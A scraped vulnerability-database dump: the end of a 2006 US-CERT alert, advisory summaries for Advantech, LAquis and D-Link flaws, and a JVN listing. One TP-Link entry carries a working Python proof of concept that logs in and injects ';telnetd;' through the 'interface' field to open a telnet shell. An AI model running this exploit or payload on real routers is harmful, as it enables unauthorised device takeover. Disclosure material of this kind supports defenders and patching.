<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2340> * CVE-2005-4092 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4092> * CVE-2005-3707 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3707> * CVE-2005-3710 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3710> * CVE-2005-3713 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3713> * Security Content for QuickTime 7.0.4 - <http://docs.info.apple.com/article.html?artnum=303101> * QuickTime 7.0.4 - <http://www.apple.com/support/downloads/quicktime704.html> * About the Mac OS X 10.4.4 Update (Delta) - <http://docs.info.apple.com/article.html?artnum=302810> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA06-011A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA06-011A Feedback VU#913449" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History January 11, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ8V8iX0pj593lg50AQJ85wf+OuHVseQVzZ0uI8h8TnmtAJmjzV6tp3Cj 34jwpSLlvo5S8svIHChcX/BYOwKVL/uQZswsjk/mbEu+TrPcVKPd7VPCetxIXVey AdC5hsAH1Wm0MnvY1LgvONo8IQ9RlT6Rj6fY7k7QhPUWsYxj/rDCWDAY9kgsHXc/ HpXWL/Cy5va35z8aYHrLVlxmofKrOWtX0PVa6lSKV8lIsY+TDihA5tYIb5wRDVxL osieJ+MHSXGchXpjX2c0o6Ja6vhJNR61LEwelk9FMLT1JRTkp+wz9/AoVUSyZ/hy 0WBP0M8cwl8koWgijNcLXA18YX8QtDftAVRwpwHKMrbNCYdrWblYVw== =5Kiq -----END PGP SIGNATURE-----
var-201601-0038 Multiple stack-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2790 IOCTL in the DrawSrv subsystem. A stack-based buffer overflow vulnerability exists in a call to BwBuildPath with the Path parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems
var-201801-0394 TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-interface variable in the cmxddns.lua file. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices. These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled). Vulnerability Type: ================ Command Injection (Authenticated) Product: ================ We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306). And the following model should also be affected and the vendor has confirmed: TP-Link ER5110G, TP-Link ER5120G, TP-Link ER5510G, TP-Link ER5520G, TP-Link R4149G, TP-Link R4239G, TP-Link R4299G, TP-Link R473GP-AC, TP-Link R473G, TP-Link R473P-AC, TP-Link R473, TP-Link R478G+, TP-Link R478, TP-Link R478+, TP-Link R483G, TP-Link R483, TP-Link R488, TP-Link WAR1300L, TP-Link WAR1750L, TP-Link WAR2600L, TP-Link WAR302, TP-Link WAR450L, TP-Link WAR450, TP-Link WAR458L, TP-Link WAR458, TP-Link WAR900L, TP-Link WVR1300G, TP-Link WVR1300L, TP-Link WVR1750L, TP-Link WVR2600L, TP-Link WVR300, TP-Link WVR302, TP-Link WVR4300L, TP-Link WVR450L, TP-Link WVR450, TP-Link WVR458L, TP-Link WVR900G, TP-Link WVR900L CVE details: ================ The detail of each vulnerability are as follows: CVE-2017-15613: new-interface variable in the cmxddns.lua file CVE-2017-15614: new-outif variable in the pptp_client.lua file CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file CVE-2017-15616: new-interface variable in the phddns.lua file CVE-2017-15617: iface variable in the interface_wan.lua file CVE-2017-15618: new-enable variable in the pptp_client.lua file CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file CVE-2017-15620: new-zone variable in the ipmac_import.lua file CVE-2017-15621: olmode variable in the interface_wan.lua file CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file CVE-2017-15623: new-enable variable in the pptp_server.lua file CVE-2017-15624: new-authtype variable in the pptp_server.lua file CVE-2017-15625: new-olmode variable in the pptp_client.lua file CVE-2017-15626: new-bindif variable in the pptp_server.lua file CVE-2017-15627: new-pns variable in the pptp_client.lua file CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file CVE-2017-15631: new-workmode variable in the pptp_client.lua file CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file CVE-2017-15633: new-ipgroup variable in the session_limits.lua file CVE-2017-15634: name variable in the wportal.lua file CVE-2017-15635: max_conn variable in the session_limits.lua file CVE-2017-15636: new-time variable in the webfilter.lua file CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file Credits: ================ chunibalon, puzzor @VARAS of IIE Timeline: ================ 2017.08 to 2017.09: Issues found. 2017.09.26: Vendor contacted. 2017.10.13: Vendor confirmed. 2017.10.14: CVE id requested. 2017.10.19: CVE id assigned. 2018.1: Vendor confirmed that all effected products have been fixed. Vulnerability detail: ================ These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616. Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file. In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113: *********************************** function add_phddns(http_form) local form_data = json.decode(http_form.data) local jdata = form_data.params.new ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil) if not ret then return false, err.ERR_COM_TABLE_ITEM_UCI_ADD end if not uci_r:commit(CONFIG_NAME) then return false, err.ERR_COM_UCI_COMMIT end -- add the ref of interface ifs.update_if_reference(jdata.interface, 1) sys.fork_exec('/etc/init.d/phddns restart') userconfig.cfg_modify() return jdata end *********************************** This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns". The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently. Then the malformed value of "interface" argument causes the command injection vulnerability. PoC file: ================ *********************************** import requests import urllib import json # This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616. # To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin' PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406' BASEURL = 'http://192.168.123.1' LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login' MARK = '###' VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK) headers = { "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": BASEURL[7:], "Origin": BASEURL, "Referer": "%s/webpages/login.html" % (BASEURL), "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36", "X-Requested-With": "XMLHttpRequest" } login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}} login_data = {'data':json.dumps(login_data_value)} s = requests.Session() s.headers.update(headers) print (LOGINURL) print (login_data) res = s.post(LOGINURL, data=login_data) stok = eval(res.text)['result']['stok'] print '[*] stok is %s' % (stok) tmp_vul = VULURL.replace(MARK, stok) print '[*] vul_url is %s ' % (tmp_vul) delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}} delete_data = {'data': json.dumps(delete_data)} print '[+] delete existed rule' res = s.post(tmp_vul, data=delete_data) print '[*] response is: %s' % (res.text) # after executing this payload, the router will open its telnetd service. payload = ''';telnetd;''' vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}} vul_data = {'data': json.dumps(vul_data)} print '[+] sending payload' res = s.post(tmp_vul, data=vul_data) print '[*] response is: %s' % (res.text) *********************************** Reference: ================ https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
var-201801-0152 An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27ec IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3
var-201801-0151 A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwscrp utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable
var-201902-0647 LCDS Laquis SCADA prior to version 4.1.0.4150 allows execution of script code by opening a specially crafted report format file. This may allow remote code execution, data exfiltration, or cause a system crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the MemoryWriteLong method. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the aq process. Script embedded in a crafted file can create files in arbitrary locations using the Ini.WriteNumber method. LAquis SCADA is a suite of SCADA software for monitoring and data acquisition
var-201906-1029 In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products
var-202007-0395 Advantech iView, versions 5.6 and prior, contains multiple SQL injection vulnerabilities that are vulnerable to the use of an attacker-controlled string in the construction of SQL queries. An attacker could extract user credentials, read or modify information, and remotely execute code. Advantech iView Has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put in a state. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech iView. Authentication is not required to exploit this vulnerability.The specific flaw exists within the NetworkServlet servlet. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Advantech iView is a device management application provided by Advantech
var-202305-0214 D-Link DIR-2640 HNAP LoginPassword Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-2640 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management interface, which listens on TCP port 80 by default. A specially crafted login request can cause authentication to succeed without providing proper credentials. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19549. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link
var-202305-0130 D-Link DIR-2640 EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2640 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the EmailFrom parameter provided to the HNAP1 endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19550. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link
var-202308-4331 D-Link DAP-2622 DDP Firmware Upgrade Filename Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20077. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3186 D-Link DAP-2622 DDP Configuration Backup Server IPv6 Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20066. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3151 D-Link DAP-2622 DDP User Verification Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20053. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3130 D-Link DAP-2622 DDP Configuration Restore Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20069. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3129 D-Link DAP-2622 DDP Set AG Profile Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20079. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3114 D-Link DAP-2622 DDP Reset Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20057. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
var-202308-3113 D-Link DAP-2622 DDP Configuration Backup Server Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20067. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3105 D-Link DAP-2622 DDP Reset Factory Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20058. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
var-202308-3456 D-Link DAP-2622 DDP Reboot Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20055. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3426 D-Link DAP-2622 DDP Configuration Backup Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20065. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3391 D-Link DAP-2622 DDP User Verification Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20052. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
var-202308-3319 D-Link DAP-2622 DDP Set SSID List Missing Authentication Vulnerability. This vulnerability allows network-adjacent attackers to make unauthorized changes to device configuration on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to manipulate wireless authentication settings. Was ZDI-CAN-20104. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company. No detailed vulnerability details are currently provided
var-202308-3121 D-Link DAP-2622 DDP Reboot Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20054. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3323 D-Link DAP-2622 DDP Change ID Password Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20060. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3219 D-Link DAP-2622 DDP Change ID Password New Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20063. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3185 D-Link DAP-2622 DDP Configuration Backup Filename Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20068. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3150 D-Link DAP-2622 DDP Change ID Password New Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20062. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3131 D-Link DAP-2622 DDP Reset Factory Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20059. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3120 D-Link DAP-2622 DDP Configuration Backup Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20064. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3106 D-Link DAP-2622 DDP Reset Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20056. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
jvndb-2024-004595 Multiple vulnerabilities in FutureNet NXR series, VXR series and WXR series 2024-07-29T17:51+09:00 2025-06-30T09:56+09:00
jvndb-2025-000043 Multiple vulnerabilities in iroha Board 2025-06-26T15:13+09:00 2025-06-26T15:13+09:00
jvndb-2025-000044 Denial-of-service (DoS) vulnerabilities in multiple Apache products 2025-06-26T14:41+09:00 2025-06-26T14:41+09:00
jvndb-2025-000042 Inefficient regular expressions in GROWI 2025-06-24T15:25+09:00 2025-06-24T15:25+09:00
jvndb-2025-000041 Multiple vulnerabilities in ELECOM wireless LAN routers 2025-06-24T14:50+09:00 2025-06-24T14:50+09:00
jvndb-2025-007390 Trend Micro Internet Security and Trend Micro Maximum Security vulnerable to link following local privilege escalation (CVE-2025-49384, CVE-2025-49385) 2025-06-24T11:18+09:00 2025-06-24T11:18+09:00
jvndb-2025-000040 KCM3100 vulnerable to authentication bypass using an alternate path or channel 2025-06-18T13:42+09:00 2025-06-18T13:42+09:00
jvndb-2025-000039 Multiple vulnerabilities in RICOH Streamline NX PC Client 2025-06-13T16:09+09:00 2025-06-13T16:09+09:00
jvndb-2025-000038 UpdateNavi vulnerable to improper restriction of communication channel to intended endpoints 2025-06-12T15:56+09:00 2025-06-12T15:56+09:00
jvndb-2025-000037 Multiple surveillance cameras provided by i-PRO Co., Ltd. vulnerable to cross-site request forgery 2025-06-06T13:56+09:00 2025-06-06T13:56+09:00
jvndb-2025-000036 TimeWorks vulnerable to path traversal 2025-06-03T15:35+09:00 2025-06-03T15:35+09:00
jvndb-2025-000035 Improper file access permission settings in PC Time Tracer 2025-06-03T14:40+09:00 2025-06-03T14:40+09:00
jvndb-2025-000034 Multiple vulnerabilities in wivia 5 2025-05-30T15:57+09:00 2025-05-30T15:57+09:00
jvndb-2025-001238 Multiple out-of-bounds write vulnerabilities in Canon Office/Small Office Multifunction Printers and Laser Printers 2025-01-29T13:41+09:00 2025-05-27T16:06+09:00
jvndb-2025-000032 Mailform Pro CGI generating error messages containing sensitive information 2025-05-26T14:22+09:00 2025-05-26T14:22+09:00
jvndb-2025-000033 Improper pattern file validation in i-FILTER optional feature 'Anti-Virus & Sandbox' 2025-05-23T15:36+09:00 2025-05-23T15:36+09:00
jvndb-2025-005467 Passback vulnerabilities in Canon Production Printers, Office/Small Office Multifunction Printers, and Laser Printers 2025-05-22T15:03+09:00 2025-05-22T15:03+09:00
jvndb-2024-000117 Stack-based buffer overflow vulnerability in multiple laser printers and MFPs which implement Ricoh Web Image Monitor 2024-10-31T16:44+09:00 2025-05-19T17:59+09:00
jvndb-2025-005107 Multiple vulnerabilities in V-SFT 2025-05-16T14:32+09:00 2025-05-16T14:32+09:00
jvndb-2025-005057 Multiple vulnerabilities in I-O DATA network attached hard disk 'HDL-T Series' 2025-05-15T18:27+09:00 2025-05-15T18:27+09:00
jvndb-2025-005050 Multiple vulnerabilities in a-blog cms 2025-05-15T18:11+09:00 2025-05-15T18:11+09:00
jvndb-2025-000031 Pgpool-II vulnerable to authentication bypass by primary weakness 2025-05-15T16:14+09:00 2025-05-15T16:14+09:00
jvndb-2025-004863 Panasonic IR Control Hub vulnerable to Unauthorised firmware loading 2025-05-14T11:30+09:00 2025-05-14T11:30+09:00
jvndb-2025-004671 Multiple vulnerabilities in GL-MT2500 and GL-MT2500A 2025-05-12T17:52+09:00 2025-05-12T17:52+09:00
jvndb-2025-001016 OMRON NJ/NX series vulnerable to path traversal 2025-02-06T18:27+09:00 2025-05-08T17:44+09:00
jvndb-2025-004079 Improper access permission settings in multiple SEIKO EPSON printer drivers for Windows OS 2025-04-30T11:46+09:00 2025-04-30T11:46+09:00
jvndb-2025-004076 Security Update for Trend Micro Trend Vision One (April 2025) 2025-04-30T10:38+09:00 2025-04-30T10:38+09:00
jvndb-2025-000029 Multiple vulnerabilities in Quick Agent 2025-04-25T13:49+09:00 2025-04-25T13:49+09:00
jvndb-2025-000028 i-PRO Configuration Tool vulnerable to use of hard-coded cryptographic key 2025-04-24T13:50+09:00 2025-04-24T13:50+09:00
jvndb-2025-000027 Active! mail vulnerable to stack-based buffer overflow 2025-04-18T16:50+09:00 2025-04-18T16:50+09:00